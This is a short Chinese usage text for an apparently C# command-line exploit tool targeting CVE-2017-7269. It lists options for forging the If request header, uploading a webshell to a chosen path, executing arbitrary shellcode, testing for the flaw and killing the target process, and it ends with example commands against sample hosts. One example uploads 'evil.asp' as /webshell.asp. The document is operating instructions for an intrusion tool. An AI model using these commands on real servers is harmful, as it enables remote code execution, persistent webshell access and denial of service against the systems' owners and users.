
CVE-2017-7269 到 webshell 或 shellcode 加载器
csc cve-2017-7269.cs
CVE-2017-7269 <url> [参数]
请求头:
-h <主机> 设置 [If] 请求头的主机
-p <端口> 设置 [If] 请求头的端口
-s <协议> 设置 [If] 请求头的协议 (scheme)
-l <长度> 物理路径长度
WebShell:
-w <webshell> 上传 webshell 到服务器
-wp <shell路径> webshell 保存路径
ShellCode:
-c <shellcode> 执行 shellcode
其他:
-t 仅测试漏洞。
-e 获取 shell 或测试后退出进程
-k 终结目标(等同于 -e 和 -t)
CVE-2017-7269 http://192.168.1.1/
CVE-2017-7269 http://192.168.1.1/ -l 19
CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin